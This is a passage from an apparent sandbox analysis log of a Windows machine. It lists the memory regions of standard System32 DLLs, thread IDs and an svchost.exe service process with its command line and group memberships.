0x7ffaecf20000 region_type = mapped_file name = "spoolss.dll" filename = "\\Windows\\System32\\spoolss.dll" (normalized: "c:\\windows\\system32\\spoolss.dll") Region: id = 3107 start_va = 0x7ffaecf70000 end_va = 0x7ffaecf7ffff entry_point = 0x7ffaecf70000 region_type = mapped_file name = "deviceassociation.dll" filename = "\\Windows\\System32\\deviceassociation.dll" (normalized: "c:\\windows\\system32\\deviceassociation.dll") Region: id = 3108 start_va = 0x7ffaecf80000 end_va = 0x7ffaecf90fff entry_point = 0x7ffaecf80000 region_type = mapped_file name = "sfc_os.dll" filename = "\\Windows\\System32\\sfc_os.dll" (normalized: "c:\\windows\\system32\\sfc_os.dll") Region: id = 3109 start_va = 0x7ffaed030000 end_va = 0x7ffaed03bfff entry_point = 0x7ffaed030000 region_type = mapped_file name = "snmpapi.dll" filename = "\\Windows\\System32\\snmpapi.dll" (normalized: "c:\\windows\\system32\\snmpapi.dll") Region: id = 3110 start_va = 0x7ffaef620000 end_va = 0x7ffaef6f5fff entry_point = 0x7ffaef620000 region_type = mapped_file name = "winhttp.dll" filename = "\\Windows\\System32\\winhttp.dll" (normalized: "c:\\windows\\system32\\winhttp.dll") Region: id = 3111 start_va = 0x7ffaef9c0000 end_va = 0x7ffaef9f5fff entry_point = 0x7ffaef9c0000 region_type = mapped_file name = "xmllite.dll" filename = "\\Windows\\System32\\xmllite.dll" (normalized: "c:\\windows\\system32\\xmllite.dll") Region: id = 3112 start_va = 0x7ffaf0920000 end_va = 0x7ffaf0987fff entry_point = 0x7ffaf0920000 region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\System32\\FWPUCLNT.DLL" (normalized: "c:\\windows\\system32\\fwpuclnt.dll") Region: id = 3113 start_va = 0x7ffaf1700000 end_va = 0x7ffaf171dfff entry_point = 0x7ffaf1700000 region_type = mapped_file name = "atl.dll" filename = "\\Windows\\System32\\atl.dll" (normalized: "c:\\windows\\system32\\atl.dll") Region: id = 3114 start_va = 0x7ffaf1920000 end_va = 0x7ffaf1933fff entry_point = 0x7ffaf1920000 region_type = mapped_file name = "printisolationproxy.dll" filename = "\\Windows\\System32\\PrintIsolationProxy.dll" (normalized: "c:\\windows\\system32\\printisolationproxy.dll") Region: id = 3115 start_va = 0x7ffaf1940000 end_va = 0x7ffaf194afff entry_point = 0x7ffaf1940000 region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\System32\\winnsi.dll" (normalized: "c:\\windows\\system32\\winnsi.dll") Region: id = 3116 start_va = 0x7ffaf1960000 end_va = 0x7ffaf1997fff entry_point = 0x7ffaf1960000 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\System32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\system32\\iphlpapi.dll") Region: id = 3117 start_va = 0x7ffaf1b60000 end_va = 0x7ffaf1b69fff entry_point = 0x7ffaf1b60000 region_type = mapped_file name = "dsrole.dll" filename = "\\Windows\\System32\\dsrole.dll" (normalized: "c:\\windows\\system32\\dsrole.dll") Region: id = 3118 start_va = 0x7ffaf2a00000 end_va = 0x7ffaf2a12fff entry_point = 0x7ffaf2a00000 region_type = mapped_file name = "wtsapi32.dll" filename = "\\Windows\\System32\\wtsapi32.dll" (normalized: "c:\\windows\\system32\\wtsapi32.dll") Region: id = 3119 start_va = 0x7ffaf2db0000 end_va = 0x7ffaf2dd6fff entry_point = 0x7ffaf2db0000 region_type = mapped_file name = "devobj.dll" filename = "\\Windows\\System32\\devobj.dll" (normalized: "c:\\windows\\system32\\devobj.dll") Region: id = 3120 start_va = 0x7ffaf3170000 end_va = 0x7ffaf31a1fff entry_point = 0x7ffaf3170000 region_type = mapped_file name = "fwbase.dll" filename = "\\Windows\\System32\\fwbase.dll" (normalized: "c:\\windows\\system32\\fwbase.dll") Region: id = 3121 start_va = 0x7ffaf31b0000 end_va = 0x7ffaf3231fff entry_point = 0x7ffaf31b0000 region_type = mapped_file name = "firewallapi.dll" filename = "\\Windows\\System32\\FirewallAPI.dll" (normalized: "c:\\windows\\system32\\firewallapi.dll") Region: id = 3122 start_va = 0x7ffaf3360000 end_va = 0x7ffaf3382fff entry_point = 0x7ffaf3360000 region_type = mapped_file name = "gpapi.dll" filename = "\\Windows\\System32\\gpapi.dll" (normalized: "c:\\windows\\system32\\gpapi.dll") Region: id = 3123 start_va = 0x7ffaf35e0000 end_va = 0x7ffaf3637fff entry_point = 0x7ffaf35e0000 region_type = mapped_file name = "winsta.dll" filename = "\\Windows\\System32\\winsta.dll" (normalized: "c:\\windows\\system32\\winsta.dll") Region: id = 3124 start_va = 0x7ffaf36f0000 end_va = 0x7ffaf36fbfff entry_point = 0x7ffaf36f0000 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll") Region: id = 3125 start_va = 0x7ffaf3700000 end_va = 0x7ffaf3725fff entry_point = 0x7ffaf3700000 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll") Region: id = 3126 start_va = 0x7ffaf3960000 end_va = 0x7ffaf3992fff entry_point = 0x7ffaf3960000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 3127 start_va = 0x7ffaf3a50000 end_va = 0x7ffaf3a6efff entry_point = 0x7ffaf3a50000 region_type = mapped_file name = "userenv.dll" filename = "\\Windows\\System32\\userenv.dll" (normalized: "c:\\windows\\system32\\userenv.dll") Region: id = 3128 start_va = 0x7ffaf3ab0000 end_va = 0x7ffaf3b57fff entry_point = 0x7ffaf3ab0000 region_type = mapped_file name = "dnsapi.dll" filename = "\\Windows\\System32\\dnsapi.dll" (normalized: "c:\\windows\\system32\\dnsapi.dll") Region: id = 3129 start_va = 0x7ffaf3ca0000 end_va = 0x7ffaf3cfcfff entry_point = 0x7ffaf3ca0000 region_type = mapped_file name = "mswsock.dll" filename = "\\Windows\\System32\\mswsock.dll" (normalized: "c:\\windows\\system32\\mswsock.dll") Region: id = 3130 start_va = 0x7ffaf3d00000 end_va = 0x7ffaf3d16fff entry_point = 0x7ffaf3d00000 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 3131 start_va = 0x7ffaf41b0000 end_va = 0x7ffaf41dbfff entry_point = 0x7ffaf41b0000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll") Region: id = 3132 start_va = 0x7ffaf41e0000 end_va = 0x7ffaf41eafff entry_point = 0x7ffaf41e0000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 3133 start_va = 0x7ffaf4260000 end_va = 0x7ffaf4287fff entry_point = 0x7ffaf4260000 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\System32\\bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll") Region: id = 3134 start_va = 0x7ffaf4290000 end_va = 0x7ffaf42fafff entry_point = 0x7ffaf4290000 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll") Region: id = 3135 start_va = 0x7ffaf4440000 end_va = 0x7ffaf4489fff entry_point = 0x7ffaf4440000 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll") Region: id = 3136 start_va = 0x7ffaf4490000 end_va = 0x7ffaf44a2fff entry_point = 0x7ffaf4490000 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 3137 start_va = 0x7ffaf44b0000 end_va = 0x7ffaf44c0fff entry_point = 0x7ffaf44b0000 region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\System32\\msasn1.dll" (normalized: "c:\\windows\\system32\\msasn1.dll") Region: id = 3138 start_va = 0x7ffaf44d0000 end_va = 0x7ffaf44defff entry_point = 0x7ffaf44d0000 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll") Region: id = 3139 start_va = 0x7ffaf44e0000 end_va = 0x7ffaf4533fff entry_point = 0x7ffaf44e0000 region_type = mapped_file name = "wintrust.dll" filename = "\\Windows\\System32\\wintrust.dll" (normalized: "c:\\windows\\system32\\wintrust.dll") Region: id = 3140 start_va = 0x7ffaf4540000 end_va = 0x7ffaf4583fff entry_point = 0x7ffaf4540000 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll") Region: id = 3141 start_va = 0x7ffaf4c80000 end_va = 0x7ffaf4e40fff entry_point = 0x7ffaf4c80000 region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\System32\\crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll") Region: id = 3142 start_va = 0x7ffaf4e50000 end_va = 0x7ffaf502cfff entry_point = 0x7ffaf4e50000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 3143 start_va = 0x7ffaf5140000 end_va = 0x7ffaf528dfff entry_point = 0x7ffaf5140000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 3144 start_va = 0x7ffaf5290000 end_va = 0x7ffaf53b5fff entry_point = 0x7ffaf5290000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 3145 start_va = 0x7ffaf55b0000 end_va = 0x7ffaf56f0fff entry_point = 0x7ffaf55b0000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 3146 start_va = 0x7ffaf5700000 end_va = 0x7ffaf579cfff entry_point = 0x7ffaf5700000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 3147 start_va = 0x7ffaf57a0000 end_va = 0x7ffaf57fafff entry_point = 0x7ffaf57a0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 3148 start_va = 0x7ffaf5800000 end_va = 0x7ffaf5984fff entry_point = 0x7ffaf5800000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 3149 start_va = 0x7ffaf6ec0000 end_va = 0x7ffaf6f64fff entry_point = 0x7ffaf6ec0000 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 3150 start_va = 0x7ffaf70d0000 end_va = 0x7ffaf717cfff entry_point = 0x7ffaf70d0000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 3151 start_va = 0x7ffaf7190000 end_va = 0x7ffaf724dfff entry_point = 0x7ffaf7190000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 3152 start_va = 0x7ffaf72e0000 end_va = 0x7ffaf755bfff entry_point = 0x7ffaf72e0000 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 3153 start_va = 0x7ffaf7560000 end_va = 0x7ffaf75c8fff entry_point = 0x7ffaf7560000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 3154 start_va = 0x7ffaf75d0000 end_va = 0x7ffaf7675fff entry_point = 0x7ffaf75d0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 3155 start_va = 0x7ffaf7680000 end_va = 0x7ffaf7687fff entry_point = 0x7ffaf7680000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 3156 start_va = 0x7ffaf7690000 end_va = 0x7ffaf7854fff entry_point = 0x7ffaf7690000 region_type = mapped_file name = "setupapi.dll" filename = "\\Windows\\System32\\setupapi.dll" (normalized: "c:\\windows\\system32\\setupapi.dll") Region: id = 3157 start_va = 0x7ffaf7860000 end_va = 0x7ffaf78b0fff entry_point = 0x7ffaf7860000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 3158 start_va = 0x7ffaf7a10000 end_va = 0x7ffaf7bd1fff entry_point = 0x7ffaf7a10000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Thread: id = 532 os_tid = 0xf44 Thread: id = 533 os_tid = 0xdec Thread: id = 534 os_tid = 0xde8 Thread: id = 535 os_tid = 0xdd8 Thread: id = 536 os_tid = 0xdd0 Thread: id = 537 os_tid = 0xdcc Thread: id = 538 os_tid = 0xdc0 Thread: id = 539 os_tid = 0xdbc Thread: id = 540 os_tid = 0x42c Thread: id = 541 os_tid = 0x480 Thread: id = 542 os_tid = 0x408 Thread: id = 543 os_tid = 0x144 Process: id = "50" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x6c963000" os_pid = "0x44c" os_integrity_level = "0x4000" os_privileges = "0x60a00000" monitor_reason = "child_process" parent_id = "38" os_parent_pid = "0x1e4" cmd_line = "C:\\Windows\\system32\\svchost.exe -k LocalServiceNoNetwork" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\Local Service" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\BFE" [0xe], "NT SERVICE\\CoreMessagingRegistrar" [0xa], "NT SERVICE\\DPS" [0xa], "NT SERVICE\\MpsSvc" [0xa], "NT SERVICE\\NcdAutoSetup" [0xa], "NT SERVICE\\pla" [0xa], "NT SERVICE\\WwanSvc" [0xa], "NT AUTHORITY\\Logon Session 00000000:0001140b" [0xc000000f], "LOCAL" [0x7], "NT AUTHORITY\\WRITE RESTRICTED" [0x7] Region: id = 5769 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 5770 start_va = 0x2c1a6a0000 end_va = 0x2c1a6affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000002c1a6a0000" filename = "" Region: id = 5771 start_va = 0x2c1a6b0000 end_va = 0x2c1a6b0fff entry_point = 0x2c1a6b0000 region_type = mapped_file name = "svchost.exe.mui" filename = "\\Windows\\System32\\en-US\\svchost.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\svchost.exe.mui") Region: id = 5772 start_va = 0x2c1a6c0000 end_va = 0x2c1a6d3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000002c1a6c0000" filename = "" Region: id = 5773 start_va = 0x2c1a6e0000 end_va = 0x2c1a75ffff entry_point = 0x0 region_type = private name = "private_0x0000002c1a6e0000" filename = "" Region: id = 5774 start_va = 0x2c1a760000 end_va = 0x2c1a763fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000002c1a760000" filename = "" Region: id = 5775 start_va = 0x2c1a770000 end_va = 0x2c1a770fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000002c1a770000" filename = "" Region: id = 5776 start_va = 0x2c1a780000 end_va = 0x2c1a781fff entry_point = 0x0 region_type = private name = "private_0x0000002c1a780000" filename = "" Region: id = 5777 start_va = 0x2c1a790000 end_va = 0x2c1a84dfff entry_point = 0x2c1a790000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 5778 start_va = 0x2c1a850000 end_va = 0x2c1a850fff entry_point = 0x0 region_type = private name = "private_0x0000002c1a850000" filename = "" Region: id = 5779 start_va = 0x2c1a860000 end_va = 0x2c1a860fff entry_point = 0x0 region_type = private name = "private_0x0000002c1a860000" filename = "" Region: id = 5780 start_va = 0x2c1a870000 end_va = 0x2c1a876fff entry_point = 0x2c1a870000 region_type = mapped_file name = "bfe.dll.mui" filename = "\\Windows\\System32\\en-US\\bfe.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\bfe.dll.mui") Region: id = 5781 start_va = 0x2c1a880000 end_va = 0x2c1a88ffff entry_point = 0x0 region_type = private name = "private_0x0000002c1a880000" filename = "" Region: id = 5782 start_va = 0x2c1a890000 end_va = 0x2c1a890fff entry_point = 0x0 region_type = private name = "private_0x0000002c1a890000" filename = "" Region: id = 5783 start_va = 0x2c1a8a0000 end_va = 0x2c1a8a6fff entry_point = 0x0 region_type = private name = "private_0x0000002c1a8a0000" filename = "" Region: id = 5784 start_va = 0x2c1a8b0000 end_va = 0x2c1a8d3fff entry_point = 0x2c1a8b0000 region_type = mapped_file name = "firewallapi.dll.mui" filename = "\\Windows\\System32\\en-US\\FirewallAPI.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\firewallapi.dll.mui") Region: id = 5785 start_va = 0x2c1a8e0000 end_va = 0x2c1a8e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000002c1a8e0000" filename = "" Region: id = 5786 start_va = 0x2c1a8f0000 end_va = 0x2c1a8f0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000002c1a8f0000" filename = "" Region: id = 5787 start_va = 0x2c1a900000 end_va = 0x2c1a9fffff entry_point = 0x0 region_type = private name = "private_0x0000002c1a900000" filename = "" Region: id = 5788 start_va = 0x2c1aa00000 end_va = 0x2c1aa7ffff entry_point = 0x0 region_type = private name = "private_0x0000002c1aa00000" filename = "" Region: id = 5789 start_va = 0x2c1aa80000 end_va = 0x2c1ac07fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000002c1aa80000" filename = "" Region: id = 5790 start_va = 0x2c1ac10000 end_va = 0x2c1ac17fff entry_point = 0x0 region_type = private name = "private_0x0000002c1ac10000" filename = "" Region: id = 5791 start_va = 0x2c1ac20000 end_va = 0x2c1ac20fff entry_point = 0x0 region_type = private name = "private_0x0000002c1ac20000" filename = "" Region: id = 5792 start_va = 0x2c1ac30000 end_va = 0x2c1ac36fff entry_point = 0x0 region_type = private name = "private_0x0000002c1ac30000" filename = "" Region: id = 5793 start_va = 0x2c1ac40000 end_va = 0x2c1acfffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000002c1ac40000" filename = "" Region: id = 5794 start_va = 0x2c1ad00000 end_va = 0x2c1adfffff entry_point = 0x0 region_type = private name = "private_0x0000002c1ad00000" filename = "" Region: id = 5795 start_va = 0x2c1ae00000 end_va = 0x2c1af80fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000002c1ae00000" filename = "" Region: id = 5796 start_va = 0x2c1af90000 end_va = 0x2c1b08ffff entry_point = 0x0 region_type = private name = "private_0x0000002c1af90000" filename = "" Region: id = 5797 start_va = 0x2c1b090000 end_va = 0x2c1b18ffff entry_point = 0x0 region_type = private name = "private_0x0000002c1b090000" filename = "" Region: id = 5798 start_va = 0x2c1b190000 end_va = 0x2c1b191fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000002c1b190000" filename = "" Region: id = 5799 start_va = 0x2c1b200000 end_va = 0x2c1b206fff entry_point = 0x0 region_type = private name = "private_0x0000002c1b200000" filename = "" Region: id = 5800 start_va = 0x2c1b210000 end_va = 0x2c1b28cfff entry_point = 0x2c1b210000 region_type = mapped_file name = "firewallapi.dll" filename = "\\Windows\\System32\\FirewallAPI.dll" (normalized: "c:\\windows\\system32\\firewallapi.dll") Region: id = 5801 start_va = 0x2c1b300000 end_va = 0x2c1b3fffff entry_point = 0x0 region_type = private name = "private_0x0000002c1b300000" filename = "" Region: id = 5802 start_va = 0x2c1b500000 end_va = 0x2c1b5fffff entry_point = 0x0 region_type = private name = "private_0x0000002c1b500000" filename = "" Region: id = 5803 start_va = 0x2c1b600000 end_va = 0x2c1b6fffff entry_point = 0x0 region_type = private name = "private_0x0000002c1b600000" filename = "" Region: id = 5804 start_va = 0x2c1b700000 end_va = 0x2c1b7fffff entry_point = 0x0 region_type = private name = "private_0x0000002c1b700000" filename = "" Region: id = 5805 start_va = 0x2c1b800000 end_va = 0x2c1b8fffff entry_point = 0x0 region_type = private name = "private_0x0000002c1b800000" filename = "" Region: id = 5806 start_va = 0x2c1b900000 end_va = 0x2c1b9fffff entry_point = 0x0 region_type = private name = "private_0x0000002c1b900000" filename = "" Region: id = 5807 start_va = 0x2c1bb00000 end_va = 0x2c1bbfffff entry_point = 0x0 region_type = private name = "private_0x0000002c1bb00000" filename = "" Region: id = 5808 start_va = 0x2c1bc00000 end_va = 0x2c1bc7ffff entry_point = 0x0 region_type = private name = "private_0x0000002c1bc00000" filename = "" Region: id = 5809 start_va = 0x2c1bc80000 end_va = 0x2c1bd7ffff entry_point = 0x0 region_type = private name = "private_0x0000002c1bc80000" filename = "" Region: id = 5810 start_va = 0x2c1bd80000 end_va = 0x2c1be7ffff entry_point = 0x0 region_type = private name = "private_0x0000002c1bd80000" filename = "" Region: id = 5811 start_va = 0x2c1be80000 end_va = 0x2c1bf7ffff entry_point = 0x0 region_type = private name = "private_0x0000002c1be80000" filename = "" Region: id = 5812 start_va = 0x2c1bf80000 end_va = 0x2c1c07ffff entry_point = 0x0 region_type = private name = "private_0x0000002c1bf80000" filename = "" Region: id = 5813 start_va = 0x2c1c080000 end_va = 0x2c1c87ffff entry_point = 0x0 region_type = private name = "private_0x0000002c1c080000" filename = "" Region: id = 5814 start_va = 0x2c1c880000 end_va = 0x2c1c97ffff entry_point = 0x0 region_type = private name = "private_0x0000002c1c880000" filename = "" Region: id = 5815 start_va = 0x2c1ca00000 end_va = 0x2c1cafffff entry_point = 0x0 region_type = private name = "private_0x0000002c1ca00000" filename = "" Region: id = 5816 start_va = 0x2c1cb00000 end_va = 0x2c1cbfffff entry_point = 0x0 region_type = private name = "private_0x0000002c1cb00000" filename = "" Region: id = 5817 start_va = 0x2c1cc00000 end_va = 0x2c1ccfffff entry_point = 0x0 region_type = private name = "private_0x0000002c1cc00000" filename = "" Region: id = 5818 start_va = 0x2c1cd00000 end_va = 0x2c1cdfffff entry_point = 0x0 region_type = private name = "private_0x0000002c1cd00000" filename = "" Region: id = 5819 start_va = 0x2c1ce00000 end_va = 0x2c1d136fff entry_point = 0x2c1ce00000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 5820 start_va = 0x2c1d200000 end_va = 0x2c1d2fffff entry_point = 0x0 region_type = private name = "private_0x0000002c1d200000" filename = "" Region: id = 5821 start_va = 0x2c1d300000 end_va = 0x2c1d3fffff entry_point = 0x0 region_type = private name = "private_0x0000002c1d300000" filename = "" Region: id = 5822 start_va = 0x2c1d400000 end_va = 0x2c1d4fffff entry_point = 0x0 region_type = private name = "private_0x0000002c1d400000" filename = "" Region: id = 5823 start_va = 0x2c1d500000 end_va = 0x2c1d5fffff entry_point = 0x0 region_type = private name = "private_0x0000002c1d500000" filename = "" Region: id = 5824 start_va = 0x2c1d600000 end_va = 0x2c1d6fffff entry_point = 0x0 region_type = private name = "private_0x0000002c1d600000" filename = "" Region: id = 5825 start_va = 0x2c1d700000 end_va = 0x2c1d7fffff entry_point = 0x0 region_type = private name = "private_0x0000002c1d700000" filename = "" Region: id = 5826 start_va = 0x2c1d900000 end_va = 0x2c1d9fffff entry_point = 0x0 region_type = private name = "private_0x0000002c1d900000" filename = "" Region: id = 5827 start_va = 0x2c1da80000 end_va = 0x2c1da86fff entry_point = 0x0 region_type = private name = "private_0x0000002c1da80000" filename = "" Region: id = 5828 start_va = 0x2c1da90000 end_va = 0x2c1da96fff entry_point = 0x0 region_type = private name = "private_0x0000002c1da90000" filename = "" Region: id = 5829 start_va = 0x2c1db00000 end_va = 0x2c1dbfffff entry_point = 0x0 region_type = private name = "private_0x0000002c1db00000" filename = "" Region: id = 5830 start_va = 0x2c1dc00000 end_va = 0x2c1dcfffff entry_point = 0x0 region_type = private name = "private_0x0000002c1dc00000" filename = "" Region: id = 5831 start_va = 0x2c1dd00000 end_va = 0x2c1ddfffff entry_point = 0x0 region_type = private name = "private_0x0000002c1dd00000" filename = "" Region: id = 5832 start_va = 0x2c1de00000 end_va = 0x2c1e000fff entry_point = 0x0 region_type = private name = "private_0x0000002c1de00000" filename = "" Region: id = 5833 start_va = 0x2c1e010000 end_va = 0x2c1e10ffff entry_point = 0x0 region_type = private name = "private_0x0000002c1e010000" filename = "" Region: id = 5834 start_va = 0x2c1e200000 end_va = 0x2c1e2fffff entry_point = 0x0 region_type = private name = "private_0x0000002c1e200000" filename = "" Region: id = 5835 start_va = 0x2c1e300000 end_va = 0x2c1e3fffff entry_point = 0x0 region_type = private name = "private_0x0000002c1e300000" filename = "" Region: id = 5836 start_va = 0x2c1e400000 end_va = 0x2c1e4fffff entry_point = 0x0 region_type = private name = "private_0x0000002c1e400000" filename = "" Region: id = 5837 start_va = 0x2c1e500000 end_va = 0x2c1e5fffff entry_point = 0x0 region_type = private name = "private_0x0000002c1e500000" filename = "" Region: id = 5838 start_va = 0x2c1e600000 end_va = 0x2c1e6fffff entry_point = 0x0 region_type = private name = "private_0x0000002c1e600000" filename = "" Region: id = 5839 start_va = 0x2c1ea00000 end_va = 0x2c1eafffff entry_point = 0x0 region_type = private name = "private_0x0000002c1ea00000" filename = "" Region: id = 5840 start_va = 0x2c1eb00000 end_va = 0x2c1ebfffff entry_point = 0x0 region_type = private name = "private_0x0000002c1eb00000" filename = "" Region: id = 5841 start_va = 0x2c1eed0000 end_va = 0x2c1f151fff entry_point = 0x0 region_type = private name = "private_0x0000002c1eed0000" filename = "" Region: id = 5842 start_va = 0x2c1fde0000 end_va = 0x2c2075ffff entry_point = 0x0 region_type = private name = "private_0x0000002c1fde0000" filename = "" Region: id = 5843 start_va = 0x2c20760000 end_va = 0x2c2fe55fff entry_point = 0x0 region_type = private name = "private_0x0000002c20760000" filename = "" Region: id = 5844 start_va = 0x2c3f300000 end_va = 0x2c3f3fffff entry_point = 0x0 region_type = private name = "private_0x0000002c3f300000" filename = "" Region: id = 5845 start_va = 0x2c3f400000 end_va = 0x2c3f4fffff entry_point = 0x0 region_type = private name = "private_0x0000002c3f400000" filename = "" Region: id = 5846 start_va = 0x2c3f500000 end_va = 0x2c3f5fffff entry_point = 0x0 region_type = private name = "private_0x0000002c3f500000" filename = "" Region: id = 5847 start_va = 0x2c3f600000 end_va = 0x2c3f6fffff entry_point = 0x0 region_type = private name = "private_0x0000002c3f600000" filename = "" Region: id = 5848 start_va = 0x2c3f700000 end_va = 0x2c3f7fffff entry_point = 0x0 region_type = private name = "private_0x0000002c3f700000" filename = "" Region: id = 5849 start_va = 0x2c3fb00000 end_va = 0x2c3fbfffff entry_point = 0x0 region_type = private name = "private_0x0000002c3fb00000" filename = "" Region: id = 5850 start_va = 0x2c3fc00000 end_va = 0x2c3fcfffff entry_point = 0x0 region_type = private name = "private_0x0000002c3fc00000" filename = "" Region: id = 5851 start_va = 0x2c3fd00000 end_va = 0x2cbb4a3fff entry_point = 0x0 region_type = private name = "private_0x0000002c3fd00000" filename = "" Region: id = 5852 start_va = 0x7df5ff600000 end_va = 0x7ff5ff5fffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ff600000" filename = "" Region: id = 5853 start_va = 0x7ff787bde000 end_va = 0x7ff787bdffff entry_point = 0x0 region_type = private name = "private_0x00007ff787bde000" filename = "" Region: id = 5854 start_va = 0x7ff787be0000 end_va = 0x7ff787be1fff entry_point = 0x0 region_type = private name = "private_0x00007ff787be0000" filename = "" Region: id = 5855 start_va = 0x7ff787be2000 end_va = 0x7ff787be3fff entry_point = 0x0 region_type = private name = "private_0x00007ff787be2000" filename = "" Region: id = 5856 start_va = 0x7ff787be6000 end_va = 0x7ff787be7fff entry_point = 0x0 region_type = private name = "private_0x00007ff787be6000" filename = "" Region: id = 5857 start_va = 0x7ff787bea000 end_va = 0x7ff787bebfff entry_point = 0x0 region_type = private name = "private_0x00007ff787bea000" filename = "" Region: id = 5858 start_va = 0x7ff787bec000 end_va = 0x7ff787bedfff entry_point = 0x0 region_type = private name = "private_0x00007ff787bec000" filename = "" Region: id = 5859 start_va = 0x7ff787bee000 end_va = 0x7ff787beffff entry_point = 0x0 region_type = private name = "private_0x00007ff787bee000" filename = "" Region: id = 5860 start_va = 0x7ff787bf0000 end_va = 0x7ff787bf1fff entry_point = 0x0 region_type = private name = "private_0x00007ff787bf0000" filename = "" Region: id = 